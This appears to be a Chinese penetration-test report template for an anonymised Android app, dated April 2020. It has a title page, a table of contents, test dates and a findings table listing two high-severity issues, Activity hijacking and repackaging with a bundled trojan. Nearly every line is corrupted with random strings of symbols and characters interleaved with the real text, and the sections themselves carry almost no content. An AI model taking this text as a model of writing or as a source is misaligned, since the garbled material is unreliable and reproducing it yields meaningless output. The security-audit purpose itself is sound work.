8 ]6 o* L: ?/ ^2 T5 I+ V/ i3 E- j
I* a {: F" g! j
9 u8 P+ X1 ^& v
3 M T" K V2 P1 T- v4 I
6 U$ V$ o$ }- Y% r
" g; J* \$ U. L+ C* p' c! {& @ o
) V k9 }5 k! S8 [* e1 |: N' u, v, { o
* N6 h- ^$ _+ l* O3 V7 k
; A0 ?3 ?: c& j% e% D
; P6 G P5 X/ m8 V; O
0 t+ q. f, A5 y8 e: c# E 文档编号:
D0 h/ ~7 w: ^) u: T
4 m# \% ]- I* p3 y# V" T K
1 u' _3 R7 W9 r# j. C
2 [; Q, C2 e7 X% f
6 l: ?$ p. j+ u. c
' w! b5 f% ?; ]: O4 S 3 S' y5 n' `! x# E2 G, j, h3 J5 a
$ @6 Z9 T; M! X
+ x. L' M" |* @) ]8 R W) Z+ m: p% u- G
' d( c% [' L5 Y/ a# g4 |6 f9 _4 w
& \3 u4 c+ T: ~/ q9 t9 X3 p1 [* e* C9 f1 p+ t8 w
/ b2 A5 L( B) o. m) q8 k7 b4 l2 E. r0 q' b9 X! A/ E% ?( k2 i
! C8 a6 t1 O0 h1 A
+ R, g9 x% ` L& m# f
" v0 R z! B9 G' }) F. c! \1 C( @# l# }0 S. a5 c6 T
+ w: `, o! Y& R( I
: u. `, w, a% H4 v
2 T+ M7 S* e0 x; {+ H8 c! y8 x# L
- R$ M- ~! S2 V ]) |8 k* Z
" T& M B* C% d! N; u
* l5 h3 G$ j" B, U& R
; a' M9 g9 \' c5 [, j7 k
+ F! |2 m6 h/ S B
$ N$ D3 |3 V/ {; f" y, j& ]7 |8 n1 H r1 `
u; n) w# y: b; X: s# P2 i- ?; x" U6 R) ^) v; T
/ X" l4 P: P7 Y5 A6 o$ r
$ ]8 A( O6 T; A% s8 ~1 ~# R; ^
9 y( J+ d) u$ b! D$ D( m" e& }
! c* q! R8 ~% b% d, F$ W5 l
$ t5 T1 Y7 G) M7 d- i# a2 a8 r5 v) V8 B3 H' W% {+ r. d2 ]
某某某APP渗透测试 2 a* P6 h/ z3 [+ {: }- ^3 F4 p
4 F: f3 Q% C/ i2 q C# Z$ u5 {
& ~5 T7 i0 p6 x8 U
, B2 }9 Z1 {8 R+ C3 g
- r8 H+ _* O! t( J5 f/ G6 Z6 @- z6 p& Z0 L
0 g3 E5 k8 Z/ p5 Y. d
2 E' g2 \- O. H: q7 ?$ _' B* e
! Q( J0 h2 l) `" Y9 ?& f
2 {8 ?( }# u' a1 v. o9 g3 Y2 [
4 J) z7 {) [, f% f
6 [9 h7 z# D$ Y" n0 V
0 F/ t8 ?. H, i3 p% ?" u. B. b0 I, [9 x' B/ m0 Y9 N& x
0 m# H" u9 {5 W: A! K( Q* X
' c, U( C2 U6 s) W
% p }5 a4 k$ n K \! u' M
1 _) D+ n' z: i, @4 n& v * T; Q% b! A# t
+ P2 D% l( ] H/ o S3 B$ b7 s
, X/ u) Y6 V) [& D) h) I2 Y0 i3 \
7 u) f- {0 O8 T9 w) H6 P) d/ W" O
$ E* C4 t4 n' H$ M 7 n9 r% Y4 C9 I s0 f# r6 ?
- Q1 F8 {+ Y4 I- ^
- F3 [( I3 _) M; {, R3 L- f& n, i. V$ Q( R' z) Q3 n
" T. y& A- `2 t l* |! J6 | V" {. m
技 术 报 告 ! `% I4 d. T% I2 w/ \
% r3 a2 Y* b' T v4 B8 S3 h
7 z5 r/ r- U: S! G
+ f! A. K0 I# k2 Z# g4 [. c
9 Y: ^, b# K4 w% i9 @- y- S9 ~- |) y/ [6 ~& \3 }) M" j
6 l6 B" f( N) h( _
% l9 q# h0 m- J; |- C3 F) u
4 j8 U0 i( w& e1 ?8 g7 K
7 O' p$ D1 p4 R% w3 O0 ]
( B4 E$ y5 U8 ~$ |
2 _1 u8 u9 {* [4 q, ?) b $ z; n9 v8 i- j2 w
6 N/ L) f) p" g7 ~/ b
- Z0 d, y( n, `9 ^. E) k% L o# I4 C
O, _" l$ P; D/ i4 N* M
* u I$ z' L) E& H* |
; ?" J+ r0 H, Q. n9 z7 h$ y/ _8 R 8 q3 t( U5 v: K- t {* H1 g
) ]/ n+ m5 t+ T1 R/ w2 C3 r& {; Z1 j4 \
5 a" B& f- ?# n* w& Q5 f
6 a) s+ k! T$ T# a0 u6 l7 m( @# S $ O5 V- i' W7 w- i7 z
1 m3 ~" r# L5 L
8 p' J" O9 Z- l% q8 f
$ A* D$ G' s) H& O) a( e& Z
; o% r$ i* @# ?8 V. _
9 R$ ^" D1 |$ y/ |( l3 J6 x
. j& N. T' O" H$ h% _, E
* x7 S0 n! B& _2 p' c- f( d6 R0 h
! G2 h9 p1 {+ l. d) J2 f" d b$ K& Q$ g- o; @
& t, a7 n A; m! E! N$ v E, d, k0 D% a- k ?
" f4 E% [: V: K; w
% q: X2 m! ]- Q) }1 |0 R& M7 Y( a
" S5 O9 z" a1 f2 _6 G
5 c5 g# l: ^4 f, n8 D* s
* n. Q$ a' x: U: \
+ A& l3 {# K. D- S" J 5 |9 B( Z6 `; }7 c5 U, o
) |" |& I) ?: G9 G* |: r2 G- B $ o) {4 }( F3 o) y. p F( X# N
: @& H5 {% ?4 F% |8 k0 k
- O8 s7 l1 a6 ]8 S8 f, g- x0 K; G2 W9 x4 a3 G5 G. H
8 \; r1 Y: D, ?4 V3 D1 \6 P1 r, L5 y! f& f9 Q) j
5 [* [ q1 h, p0 a5 I( T! I( S5 p* S$ z
* }7 f- |5 i. O) y
# H4 O% ~, j7 L$ y5 T: f
/ ~' }: `6 o2 ]8 R7 V
% H2 J0 J, z1 t7 b1 U' `4 @4 G4 Q( z
, L' \: l7 x5 E. B: Q+ w# ?
: _6 [- x% K# }2 k+ a
% y3 z `" w- f" c
8 |! y% |( C* n& h2 L
' h: S9 h- R$ l, K
9 d7 g$ |3 z9 b) \% f" K( G $ ~0 ?' Q4 q; P. ~
9 X/ ^) D' W" E: s' N5 o
' P* {5 Z! L4 N8 {% C
5 E- B) N. j; I4 _' X/ P1 B
5 a1 G' z/ o) G6 E; A
+ }$ t3 |; P4 H2 F8 i! G8 a
0 |8 J: ?: k: G, s7 a7 _2 k1 d1 j; F6 ^$ t
) h+ p5 P9 t* Z: q
" Q1 t- l! @, b! P: d- {6 s
2 l* q$ U# N$ w/ f# B1 V% U+ m- J7 E% R' @6 n( V2 h6 e3 M% ^
2 a* Y" m/ S: Q7 r9 \( s* n4 [9 A/ [# D0 J1 w9 E* W
/ i2 J" z0 Z" [8 ^$ L
" [) Y g0 O4 [5 D6 R
7 k5 R7 y, v' P$ Y
' b4 V+ m: C5 l# _! Y
1 E" t+ l( \) ?0 G$ R: M
: k2 J4 z. q. W' R- {
2 `1 X& t7 \2 Y {
. |. q& e* O( ?/ D# K3 U& C! ~
1 T& M. e& ~& `% k2 s# ^; p* D6 s+ W
8 f- V0 G' s t9 Y& J. ^
$ m9 G: Y4 u4 G
( _, ]) N0 W6 `5 w l6 @0 Y# ^
! n* i; u, i' G' Z( o
) q. O- l6 e/ ^& K$ a7 G
- I q- B2 u5 C% F% v
0 Z4 F7 u% W: W: N# C
% C$ G$ ?# |- m( D
, T& ^/ p# r3 T! }* t3 i
7 m3 F' Z0 g, B, V% M, o$ M. R0 ^5 `) { u
3 U' `2 o) K3 C! H; ]( s2 }! r1 F
: c6 A& v( N, H! |) i, v( p + V. q0 M8 g5 K, W
: Q# x) z2 r# ` z6 D- Y
7 w' l$ q5 X. {3 C$ X5 Q
+ f( c# {2 H) B5 I5 j" L; V
p: J! B1 H3 v1 T& l' N
r7 o2 K' I4 K% k$ @( X2 l: X
, Y0 j! ~. J" V( V1 |- B) P
. V9 g4 m: i, l' U7 a8 _
* z) }- n0 }, q
# Y0 s% u# ^8 N6 z+ [ # R5 R% U4 x: B4 O8 M, F: r! Y9 k
) `$ t% u/ t \8 k 6 R8 u6 X: {7 B, ~& t$ C* V
7 I, V. b9 K: y1 ] O3 }6 b! ]
! m7 r/ ^, i0 R' m5 Q N1 A
3 z: D% B- u* R. W q) i $ p0 ]/ O( B; |6 c% C9 l; n8 S
; T6 @6 i$ H! G0 ^ S 二〇二〇年
8 }) }, g4 i4 m( P! U- k O8 e3 q t1 p# A
4 ]2 \% f- L/ s' E7 j2 Q7 U/ R
1 Q/ d0 S( G& G% l- m% @5 L
3 G) D2 v0 C# ~' K/ Z. s# ]* M$ a9 f- V) ?/ u4 C
9 z3 [! H& s' T/ h$ f/ j" x) U F
, R3 K0 Z# P7 n( p. n
j9 d: @# X- Q* V1 l
2 [# J0 I- `" Q6 |: N6 h: z6 Y Q! q C+ H; q# P
; M7 M# {( z& t0 m* ~4 t0 f! S
?* R) w/ z& B# H* C7 G7 ~
3 K* K; d- R' U4 K8 u
+ h* ?( ]. k3 D! F: [5 l
& G( Q" Z5 R9 B. {: o3 F8 ^
4 K3 J* V' m5 O8 j; j- W8 M2 F , R9 M/ M2 L( B2 s2 _6 v
[! g) T- n1 R. H5 u
_: X6 [ g" M: n6 L; l; ^
4 u8 K: q9 h2 ~- I" N 目 录 0 J( o6 s% _0 [4 z' G& ]
/ y5 ~! L6 T+ g* K3 l
) P0 E$ y+ h' ~
. a V( I& W& ] s; s0 D
3 r* | M R" [: E% ~! [5 D2 Z7 x+ f2 v# a0 {$ [( ]
' c0 P- p6 B3 ^3 M3 s+ M( @
7 v& d D# c2 q. w
h" h2 c! Z% H# U# ^7 p: y' Z5 s8 ^( I. h( i6 h/ l5 V
6 W1 E' _3 ]! e. V" g0 @0 }+ J' w) @% o: X2 ^/ I
1 Y- _9 b. y+ X8 Y! H, s2 m
) `' V; M& x5 a. |) L% o- h: S 1 概述... 3 ( X" e6 [# [3 @2 e- N6 v8 ?% P+ A
3 d" h A* \' t% U2 c
: T, f2 ~* A$ i0 J
3 z) q! h2 @; T 7 ^, V7 ]+ S: j
! s" h3 O5 i; k3 { 1.2测试时间... 3 : I9 d& H ^+ A& a9 F" x! a% ]
J$ e; \5 f2 H! L- Y; x* I
1 k2 X" |' v/ T
' t( `/ T$ G, y 0 P! v+ F/ V8 h& B2 n
. {$ A1 ]" ^- V0 D$ V7 }' I( ]/ Z
1.3测试对象... 3 5 D% Q3 @& C1 T' z/ x) y; m
. H" i& o# H( c6 i) a) ]9 K" V
2 O$ n4 _9 N& ?- X
% n# i3 Z6 ~ c5 c
" m/ y# z* o* J2 I0 A2 G- ^8 l
4 k. M) u J' A) O4 u 1.4测试结果... 3
( Y, l w9 b3 \9 Z2 B- G& S
3 h7 x" _$ {, W6 x( [
& M, C/ i- D, ^. c# ~9 n/ t- a& z& m, f) y+ Q" M3 z) e0 B
* }, X1 D& y: g1 I1 M
' n8 D( a' @1 g+ O' ?$ ]9 J# L 2 检测结果... 4
0 z. Y6 @. z( x0 Y
: I$ C. l( C! K: V
$ f6 L1 [! U5 R+ C8 ^& E+ Q$ M/ S5 h6 c
* Y% |% l! W; ]$ f! v1 o1 f
- c7 D/ H2 S* ~ 2.1 某某某... 4
7 `2 }7 }# t+ V l& M5 P6 I. t4 {+ R. i$ g# v* y5 J
7 c+ r/ A# [- n: t: Q( M1 t& ^
$ |, P, a% W4 L% k& B
. g# }! q5 W4 T' N2 w6 Y& `3 N8 [& g
2.1.1检测目标... 4
! y( @8 Q. o- \8 c2 I5 O9 [& I- r |2 G
6 t9 h" L# o3 G# L5 \
% ^3 K( ^4 |: C X% m' f/ d0 {
( B; E1 L0 t2 j" |# a" d+ {# R' s5 A, f
2.1.2检测结果... 4
+ I3 Q8 \; ~ Q8 e5 }; l% U9 `" @+ g. W8 ]2 f
+ }( @& M3 C, x7 k# D2 t/ D
- f/ |* F3 w a! w5 _
# Z+ {4 F" a% M. ~" d
# l5 ?# ?! P3 \ 2.1.2.1. 4 1 r' p: i/ V f9 ^% A3 U& d
8 K- |9 L, B9 Q+ n% J& h
. r' ?5 |4 V. ~$ H# I( C
. v$ s: C, ]& g9 W7 y
9 ?/ L. q* t; E7 F* ^! |
$ o6 ?) ?1 z6 e. A 2.1.2.2. 6 ! l" _4 ~0 C1 k }$ J" p
/ e0 ~$ k$ |6 [: |4 d; T2 e" x2 c
" w0 m4 [* d3 |5 f. t! @
; @! W( O# r5 r9 c" x
+ w2 R# e! I3 H9 S% t5 q8 h% G! S) ~5 Z4 S9 X% }
7 y( p/ g8 a5 J5 E# B
! k" C# r1 _; S0 C9 Y& {9 `& D2 i
b" t0 x! R5 e8 `* @* _2 |
6 r0 H7 C1 g m9 ~; j$ P y6 ]
* v0 h" r- ^- _. Y3 i2 O
0 R8 b0 e3 z0 ?4 r6 o
. O1 _ A5 ?3 E8 D, n
( I- g: [. b+ `
1 K/ S5 a1 D7 ?8 f( a' A k% G! P4 g' E" N
& a6 a7 ]( E7 Y6 {- k
7 k. G4 D3 z6 o3 ?# Z; Y9 f7 s 4 A+ w9 g/ v" B; Q" n" u
3 j& }! B5 t( g% T$ l* U 1 概述
/ K7 z) ]3 F3 ]$ p. c
" C7 Q, k$ z# }0 r" M- T
0 V) h3 K1 z q! w
; L; f, q+ ]7 y/ Z, e 2 L; {# V" l/ }4 |
' S7 I1 M/ d2 [& Z0 K# D1 p& b
1.2测试时间 * h; E/ `. O) B& B* Z/ a
t9 p" p' J) d5 F% a$ f8 J
" ]! p% @ F0 H, \. D
2 X, b* j, W2 y0 x 6 K& W }$ P. ?, D3 w
2 L Z+ M/ w* R5 c6 x h+ } 9 x- ~) ~8 X, G, `8 F" U8 T* l
1 M9 n1 H4 o5 K( U2 m
- d3 \; U" B% R5 Z: F1 I
; { c, @8 _. u + ]; I9 I4 L4 ?9 i) i i8 h @
* T' g Y% N1 N' A
* R/ W. ]/ n% y9 r. q T; R+ z
渗透测试时间 , h5 U/ C: p$ y1 u: o' V0 W% l
3 G/ j$ a1 H. [
' U6 Y/ `+ X M+ G* T7 x2 ]( O& E, r6 S
|
. X) c+ J' z8 {/ K" [6 z: o! W1 i4 \: i L6 n4 O3 a2 j& h) f+ v/ Q
/ a$ U/ x! E# X# Q
+ i# Z' K: K) I" E/ S8 c) V* _ ) Q1 s( ?4 ^: f3 g6 e4 Q ~
+ i+ i+ ~' ^+ _, l7 u3 R3 X( x : f c3 @) W, u1 T7 w
+ J0 P/ \8 G4 `/ F) |, Y! k 7 E4 Q" Q7 o' h$ `1 z
' R& m8 y& p& v: l: h0 Y
起始时间 ! V8 {! v" |7 [3 i) P9 ?4 t0 f6 o
2 w, l' w5 u) B# @/ o4 }4 G' ?
! l+ l" B: A; ^$ [
2 G1 \- @$ n2 h. o5 C! }0 ~
| % p9 q' F5 u" Q1 t" m1 V8 k
" T5 o( U- A6 d8 U$ O# A$ c ' H+ q2 k7 { }+ H& T: x' y
4 _/ {! e$ ]: G: f: N# _ % ^. Z* `' ~0 j! p! L7 |) \7 R" h
8 o! i Y, X. |/ B 2020年4月6日
Z' \, \ v4 e/ G0 U# v
# {) P+ S# d# t! L0 l! U# w# O
5 O; c9 P" z q3 e5 R7 _" _) I" Y
|
% A) Y5 L u( ]; j3 W, ?$ M; D% P: q' I( Q# U3 q: N
/ ^2 b% b: w1 L; w
5 [* q/ y$ N G1 I3 ?5 Q
; y Y; B3 }8 m4 v( k
5 t- x, j5 a5 X; t " l" J% x, `$ {& l) Q0 `
( A; Y5 U' B* K4 R. U7 \ 5 F( }8 b+ w1 ?7 h o8 j- P/ R
; B( J. ]7 |. [$ ~- A) y. { 结束时间
9 g# {3 I. E h" F1 c
1 Q' X! S& v4 L, P; z ( E' l, i! b4 e1 H9 |4 u
0 G+ D8 \9 H0 T |
! N5 |! s x: k. y/ }* F3 ~; H1 ]1 R: ^6 l) E
6 o. u5 X2 n4 t% |( c0 e8 g( X J6 r/ N* F" H1 u2 `
$ Y+ N) R7 O: L: Y: O
& |7 Z- B7 E" h- u% O$ y 2020年4月9日 / n0 x/ t) @) O
/ c& E0 ^ y- X 4 d1 U" n: A3 m' R3 J& E n
& N; G) I! |: z7 c0 F |
3 O$ L$ `' Q4 G5 N3 u6 k6 @) t" ^! ?* X' s' b6 Y7 Z T
4 {5 |. F! O1 a% q Z6 w
5 o5 T; v' F T- t5 b4 g 2 w" Q! ~/ F$ q: `# P2 n+ q' @4 W
9 [" o/ P) s/ A3 b" g, T3 ^7 N
1 p' F2 b0 J) ` Y; m, A
+ e/ \ F0 u1 X0 V9 M 0 M' I" T2 M9 y0 j+ ]8 D
- k( T7 Z8 i w0 s
1.3测试对象 6 l8 B. W1 A4 v5 l( a3 [( L! z0 \5 f
6 B! Y. d1 z4 o b- A
3 f# l3 u5 X* E. x7 P1 Y
) {3 l- f8 { T& e6 o `
; W% @1 S4 Q8 R8 j5 `! N3 l; J0 A: N6 t3 X+ c$ o+ o! e
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
7 F' e1 y5 O$ V- e/ U* O9 a- e _
& W2 I. y% e, m* S* |4 _/ A
+ _* T6 O1 x" r& \
6 e# M. h- t: f# y6 D: q3 B1 j: g
F6 t# C) K3 S7 Y% N3 s8 f7 x* |( n
+ Q5 |2 u0 a3 l! H5 F& m/ Y 表1-1 检测对象
2 k: p1 r) C0 T8 q7 F5 L" x o# P6 X9 J; J: Q0 V
2 _/ ^! f% H" ?9 F; H" D" N* g! q
- ^/ S% F/ K+ \" x) h+ R) B + P+ ^9 \7 X: h) n) B- |# _
' J0 }0 c1 _, g
$ R+ F$ b% Q( w) j M! p! A( C0 V% a# N @; z
2 V" ?9 v; N6 y; d: e
! K, H) i5 u l+ t! W* n( W/ j1 G' Y ' X( K9 a5 c" z7 R$ |
; ^. f7 f; p! S1 B9 R7 U+ G/ L W
5 z+ }3 O- d: V7 j/ {$ J+ N$ a( o/ b- X# \0 }: h- k
序号
3 k" L2 Z- z6 n$ K. @( M
1 B. G C6 T( z" m W * Z) }2 T' O: l* C4 `! a4 e' M+ r9 n
/ q0 y$ K# Y+ q0 S( ? | . k/ V5 N& [, V2 l
+ N* D, u, l$ Q! k$ b1 T& d
6 A3 w6 ~0 v! A" v4 J3 h
4 c0 ^$ l% E a6 B1 C' ]( `
9 Y& v! X+ a. f: S @& C: |# \& U8 P$ [
测试对象 , m6 G; ^# w0 ^
9 |9 q/ P3 h; b( X+ |) B
$ X! ~- h5 `* l# }- @
+ J& R4 C; h' U | ( y" e9 `- Q" M9 o7 P
: v, b/ u' l+ V1 E0 T
8 [$ Z8 {9 J2 ?7 [. c3 Q" N" I* A
! j0 f; _# i/ ?7 _9 _/ {. U6 e / g+ A, q: X5 n4 ]5 v" V' ~
6 F6 N* e! u# ]- K7 K! b6 X0 q5 X
测试地址 : ]4 k$ l% n+ u0 m
3 t8 w; `, ?; V( e& W$ e- U
* z# P2 J' {- [6 |
3 i2 o2 T3 J- P: S |
4 \. a7 D, v" t- t& p6 O E/ A9 G- p* d5 a- W
9 X- O* M7 u5 n6 V3 k( l
" h! t" B) C6 N1 d+ Q* ]
# s7 @5 X" [2 \3 a, G, H* E+ r$ g. }5 ?" e- [9 z3 ~
安全漏洞 + |5 M1 _$ I4 Z9 U
$ E8 z/ A+ }/ |! F) }+ m L0 C3 G6 P4 b) E3 |% b) A
7 w! [2 R1 B: k' f1 t, ]
|
! O. M& C P' f1 F" P: x9 d6 X9 ]3 b) W7 Y
6 U) L7 n3 L9 p2 G1 J- b2 m" m
" @$ y/ j m! l* ]7 H; V1 Q* m
% P: S/ v6 V! t1 b) Q0 q3 B8 `8 l! ~
9 B% r! l5 f" L) s8 a ?! Y& Z8 D' O0 p8 d
Y3 q+ M, b3 {) O7 D
6 @7 E( C6 o( {$ D- D
0 A: u7 V. l. H3 q+ T 1 4 n f# p0 w( B/ t# r
7 _) P6 b {* g! g" f4 `
8 B' S! c3 L6 J; O/ p% {( l# Z6 _0 L8 }. }4 p3 q) y
| 9 f* Q/ a" O. s6 t \ ~5 d
e/ v- R4 ^4 a1 e3 R8 w+ E3 _7 v
) ?5 ?/ [9 I B+ {
1 }2 b( V/ j& K ^ + r- e u7 t7 @5 K" J: G
$ O3 j) U6 j, r$ C 某某某安卓APP 8 x# S, x y% c0 W1 O
; k% L! P4 r! V: U 4 z/ Q3 _1 ^# n _; u3 O
6 }' X& [ C( v+ @) {5 N | : t4 e2 I6 ]# i4 I
( w0 O% v' Y0 h4 m. d( Y2 @/ M2 s7 W; ?
; M1 y* z) e$ E3 z) T
/ T% e) Q# b) c4 I" Z Q7 [* P4 C
( U$ q7 z d y) R9 i
0 m2 f6 k9 f) @6 `. w" e' K
0 l. c1 l# W1 K2 P/ D: Q4 {: l+ g% N
( h: V6 x9 {; L- D3 `/ _
( y" c) N' t/ K2 r+ e |
& b$ n( ]. S7 T4 O7 L o* }7 K2 z. D* T! Q- N% s' _
' |% l, b* C" {/ k
; C* x7 _0 Z1 _, P/ B9 h/ V
: p% P& U2 s" W8 t- Y- o
4 J; Z, [5 @9 n- ^0 j9 c m 2
. H0 m* @! k+ L6 _% p7 I# o& Z
; u) h* ? H% P8 Q/ ]. O$ r ; L V7 D1 O. [- v( F7 u
8 N2 V4 S! d6 @" z; g! ?
| ) d% j' C$ T0 p6 G
4 b. w3 k6 c( ?4 v5 @) n
6 o/ ]8 Z& ] b( P! V3 E4 R$ g8 ^3 k' |/ Q* {5 X. A3 y- m+ p
2 V6 a# z$ w- C- ~
! {2 P1 ?2 I/ B& T
I0 g, [' w, T$ @
! y& g4 o" C/ m9 Y# ?
' u2 W* ? y4 g v, J% b9 k2 c. d9 z$ S
& C& C: }: ]* ^7 c m# S6 n
1.4测试结果 ( b Y2 V7 s& t6 C" { ]; r
# _( h2 L5 [ q% Q# |* m5 A
7 u( [) B8 H7 w
, D+ K0 }+ T$ z8 }7 J: E! p5 x f. p/ b2 g0 `( Q7 A6 Q
- H0 y1 S: H9 t3 z5 G" Y; x
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
) ~, C1 w$ q) d1 r' r k
' g2 G4 ^6 l; C) t
6 n. y9 o) E( Z/ g0 H/ b
8 F# Q7 t$ Y6 o( | 5 P7 I7 T& `6 K# p
& Q _. D. [( Y- `( Q! |$ H
# J0 y4 S. d5 w3 v0 C6 n7 w6 `: L8 d7 T; L$ j U: x9 K
' o- r# c( e; `% l0 b# I& o8 n8 C2 x
; R* k: W$ ~% z& W% ]3 h
7 ?' F$ k+ e! E
% i- v% N% i7 {- k# \+ f* v
2 H% m4 L$ d7 _" n
4 r' K; X6 `4 S& ~% j. M , s, v: k* u+ Y/ ^/ U' `$ L/ j
3 X2 p6 e2 l: B. C" V4 D* n5 W 0 R( R' N) y4 ?
( b$ c) e" E, ?7 z% z6 g
* h" I* g2 T4 ] U
, e( {! X; R+ ~) R8 P W
; s) S: t& n! S- v& a* w4 K" E7 b h
序号
) t& n9 S6 f" o( @+ V
* Y: J; j' [* O; p* d W5 v* O7 j( x. [3 `; k. L
. i Y9 ~% E* R6 X2 X, ^* L
|
9 t+ a, _6 J4 e( }3 I
$ R8 d3 j# `# g5 ~7 j$ W
6 O. H2 o$ i8 F" A. q1 }8 J3 L1 @' F
( P" j, P& h5 k # y8 ~5 W4 H5 j w1 f4 F, h
$ D, S- `' ~. I6 w. u) U 系统名称
) f: c% Q1 E6 Z$ a. e3 l- |4 Q( q: M" `% L9 l$ v. ^" l! O4 p# q# f
' F, ?$ ?* B8 R: w0 z2 |9 I
6 |! O3 L) M1 @0 n5 S& |
| + B o; ?' X% U: _
, S7 D, m1 K7 ~3 Q% [+ r% M2 x" T: m
" O0 L( T* F& V7 r- e2 c7 Z* n0 B0 h& n8 }2 _8 @5 t
; D, ?! A4 G, K1 d n9 ^6 Y
& x& R# h* C6 i2 N
漏洞名称 6 x/ s+ n, g8 ]3 R
2 z T/ M* z! y# a9 v7 \, k" p 4 e- E7 `( I8 x, f! I8 p7 h
w* K: Z$ i$ P" K# V |
9 e! b+ p; \+ k8 Y
1 o( I; [; `1 W; y( f U/ N
& I, j( L, X2 a$ L7 [# Z# A
. B3 a( d# U& E/ h! [6 t; }
$ ]; `, ~ E- \3 y7 w1 h
8 Y' c8 a" e; } 漏洞危害
: O k2 K1 V* Q* {5 Y
) D. U/ @9 V) ~& o. A& k
- ?, D( s$ I$ i7 A' |; v7 J d: @/ L* T3 I
|
3 x4 h" [5 p+ P% y# M
3 }& h* f+ i/ d; a y3 {
U- g; V+ v$ |% P; l0 ~; j5 S7 Q. @4 n
: C( {8 t1 D& V
# z. s7 K7 }; N: K/ } 修复结果
9 _4 w+ o& G. V* k( Q6 Y( a' q* \- e6 b0 `0 _) N- d
8 T9 B5 ^8 l, }8 _8 j# @0 N+ _" C
( H0 a- E- q+ P3 `+ J
|
$ {2 {& D5 B+ i i; R
1 W4 X1 ~- e2 t8 S0 Y2 E) E
/ L; K" \- p4 K L2 n& R" W
* L# r0 S3 j9 ~' j, h/ L; L E
; [3 Q9 V& E0 E- ~6 `( [2 Z6 z$ ]* [* N4 ]7 X
/ u! B" k" o7 N" U I! _
2 h. C) R. t3 G+ n4 f# F
) j U5 f; g7 i' j
0 m1 u; z, t, `5 p4 P1 ~ 1 + [3 C, F% d8 S! @
6 W5 m4 ^5 q2 D5 b" ]7 P, \
7 z" X) n; F: T
7 w# @% Y9 b- V' e0 Z5 @ |
7 g$ M* C, y# m0 u' V2 T
! \$ D$ b/ n$ I5 |
; @6 d' o! [, o: W0 W: s% U: Q7 e' A
) O$ A- t2 O# `: p8 L5 R, [
, H; i; |0 r1 T/ W; r
某某某某某某APP : ]6 g- J6 [6 M) x8 F+ n, \
" r/ t) W* i# y/ E; G* }
, D* v2 h. P8 [- b- T6 E% v4 O% f7 L f: d4 r6 M2 I
|
# r9 v7 U- B7 p0 q# T9 n5 X* b1 n) d2 O
\' t/ e1 [6 a/ [- V0 Q
6 I t+ V8 h1 n+ s/ t " g' E: W* N# @- O$ p/ L$ d+ Y, X# _
7 x5 G: F# q$ I6 D. u; Z9 Y, {- B Activity 劫持 1 q5 J* x7 w7 H) L
9 C. y; Z* Z0 y
4 l9 c4 ?, R1 ]( `* [. l' n. T) o) m/ X$ l7 z; {
2 t2 Y$ [' ~, o' Z+ y3 t# D$ s9 u" S- f+ a
3 J& \4 h2 n5 _
$ ~( j& _4 z, K' c" T: N' o
. n% H4 j7 Q$ n! y: q
; ^ _+ s, R' t. v( G' l+ N |
( ?) z- u7 n/ I6 R# n7 D
: I! e* q) H& B& N, x( V) d* A- ], T w+ c7 d; W( ?2 b, \8 x
$ L/ h1 @; |& A% G9 N1 @- i' c
$ L0 k+ i( M' h! |+ c
* r" T; C$ T- w; G 高
" g ], m2 E. Y5 D* J% P' }3 }4 t7 g& G6 |7 S, E
& V S0 [3 D2 T5 Z- F! L0 z! b* H1 L# O
| 6 d9 K, n( c! p* w" k
9 i% C( U; ~. _' _, p: m, ?; h
8 D/ B3 a- ^; o% u, i! ~
/ g4 S- ]; P6 m, S: i
4 G+ t/ d( k; m" ~
! P7 T N2 u+ C, s, x) L5 z7 h: c6 {
3 h/ F+ ?! W; {8 x( m0 Q, H G
- L7 K. |6 I. [+ I, S, j , a }8 Z: G2 v( l3 B$ X c
1 N9 e/ L# o0 J: P | : r% `% v0 g' N2 H" h2 r
9 E: a, [( c3 |9 [" ~% ]9 s( W. [0 f
! G" V# P) R3 y1 E. R- q; _/ |
/ I0 |2 K( [1 d+ ]" j3 ^ K; g+ z3 f5 I# R- A, |
0 x3 {, w( P L8 p5 V
; E' Q8 ^. j V. D' G$ }
, i3 x2 t- L* \ f" r. ? $ G8 b( C7 `2 `5 X4 S2 v0 N* c7 d
2 |! o. e! m8 P 2
3 b" p" M" \+ y! {4 G3 j2 A* Y1 W2 z. {& e. H0 [( y8 ^: M
6 @5 m8 {% r K. U7 v' r
/ R, M6 J% i9 B/ ?' m
| N" R U0 v' M9 u# ]
0 {$ C/ F! K% U' e4 O. l9 b: M4 k . V% U$ l0 {! } W7 P& H$ P$ L8 e$ v
* g; G1 S4 z, T# l4 p/ ^& f
7 \ p4 B, @) a+ v& D; [2 V6 ~
* z& S) b- w ~9 o- }4 q2 C 某某某某某某APP
( M1 s+ N; T& K9 D! C) _: o6 R! i6 ^: P9 {$ @
5 P& J8 Z: {$ X- ]1 }( d+ ?! ~6 _% w. B- e j5 D( U
|
, ?, H. b$ G( k$ o$ a2 I
1 j3 w, J/ p% u! J ?4 ^# p1 n2 [# U
9 w3 ~' \3 W; W; r& P( z+ {
! \# b. v# x5 @* y$ R
7 M5 b6 G# I! P$ ]3 _ L) y7 U9 N# P 反编译二次打包捆绑木马、篡改APP代码
$ j1 r3 L3 b+ v" z8 h \0 r( v$ N. G6 _ Z* a3 |4 O
" Y3 T9 d$ L. [1 H! K i2 l5 G& H$ {3 @% f3 @5 i
|
4 e( _: Q' w$ X0 n: W* x" K4 g3 ~ h9 [* p4 O1 ^( i# K
1 I9 }0 Z2 a0 A0 P
, Y8 \- D0 H8 Q, K/ h8 y7 S
- {% J9 c( f- Z# s# V
; N" w' ?& {, Q 高
; e# n$ @5 D6 Z3 G4 P
: w0 S- _: y8 z9 V" {
5 [. i5 U u5 o. G9 b( t$ n4 E4 Z& p4 ]& Z. y: @. K
| 9 B1 y( }" M% p
9 E6 G" K2 h# I
2 s" E8 s9 P, u, s& ^# ?: v( ^2 n+ J% t$ n
" Q' P% \; Q* I C5 ~1 ^
2 u+ Q. Y7 e" o/ g* A/ V/ a$ g1 |* U4 P9 i" @% N4 A
% r/ i4 ^) m( q; l& d! `6 o, X- p1 j4 n( V) W
9 e( \" F* P8 W/ K# _! c$ o
2 W0 j- v8 J/ ?* Z0 N7 \8 V | p3 _6 W i: ` H/ J; c3 e
9 H/ f; ~' @6 A2 q4 \* p
% u4 ^, E( p0 W
; A4 ^, y1 a4 s 7 S' ?* l0 `& Q8 f$ g# v
